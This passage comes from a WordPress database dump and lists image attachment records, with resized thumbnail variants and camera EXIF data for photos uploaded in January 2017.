12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1333896040\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(616,313,'_wp_attached_file','2017/01/DSC00168.jpg'),(617,313,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2017/01/DSC00168.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC00168-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC00168-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC00168-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC00168-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSC00168-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSC00168-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC00168-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSC00168-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSC00168-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSC00168-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSC00168-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSC00168-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1157800353\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.9\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(618,314,'_wp_attached_file','2017/01/nc13lr.jpg'),(619,314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:18:\"2017/01/nc13lr.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"nc13lr-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"nc13lr-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"nc13lr-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"nc13lr-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:18:\"nc13lr-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:18:\"nc13lr-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"nc13lr-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:19:\"nc13lr-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:18:\"nc13lr-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"nc13lr-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"nc13lr-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:18:\"nc13lr-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1273237114\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(620,315,'_wp_attached_file','2017/01/nc14kit.jpg'),(621,315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:19:\"2017/01/nc14kit.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"nc14kit-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"nc14kit-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"nc14kit-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"nc14kit-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"nc14kit-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"nc14kit-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"nc14kit-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"nc14kit-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"nc14kit-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"nc14kit-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"nc14kit-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"nc14kit-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1273236649\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(622,316,'_wp_attached_file','2017/01/newCabin13.jpg'),(623,316,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:22:\"2017/01/newCabin13.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"newCabin13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"newCabin13-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"newCabin13-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"newCabin13-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"newCabin13-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"newCabin13-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"newCabin13-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"newCabin13-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:22:\"newCabin13-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"newCabin13-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:22:\"newCabin13-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"newCabin13-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1273003776\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.7\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(624,317,'_wp_attached_file','2017/01/newCabin14.jpg'),(625,317,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:22:\"2017/01/newCabin14.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"newCabin14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"newCabin14-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"newCabin14-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"newCabin14-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"newCabin14-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"newCabin14-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"newCabin14-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:23:\"newCabin14-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:22:\"newCabin14-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"newCabin14-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:22:\"newCabin14-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"newCabin14-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1273003544\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.7\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(641,61,'_yoast_wpseo_content_score','60'),(654,334,'_wp_attached_file','2017/01/DSC0111cropped.jpg'),(655,334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1621;s:6:\"height\";i:1295;s:4:\"file\";s:26:\"2017/01/DSC0111cropped.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"DSC0111cropped-1024x818.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:818;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:27:\"DSC0111cropped-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:26:\"DSC0111cropped-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"14\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472205389\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(656,335,'_wp_attached_file','2017/01/DSC0202.jpg'),(657,335,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4288;s:6:\"height\";i:2848;s:4:\"file\";s:19:\"2017/01/DSC0202.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0202-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0202-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0202-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0202-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0202-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0202-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0202-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0202-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0202-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0202-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0202-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0202-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472227492\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(658,336,'_wp_attached_file','2017/01/DSC0452.jpg'),(659,336,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4288;s:6:\"height\";i:2848;s:4:\"file\";s:19:\"2017/01/DSC0452.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0452-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0452-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0452-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0452-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0452-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0452-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0452-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0452-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0452-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0452-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0452-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0452-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472288529\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(660,337,'_wp_attached_file','2017/01/DSC0528.jpg'),(661,337,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2976;s:6:\"height\";i:2134;s:4:\"file\";s:19:\"2017/01/DSC0528.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0528-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0528-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0528-768x551.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0528-1024x734.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0528-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0528-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0528-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0528-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0528-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0528-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0528-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0528-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON 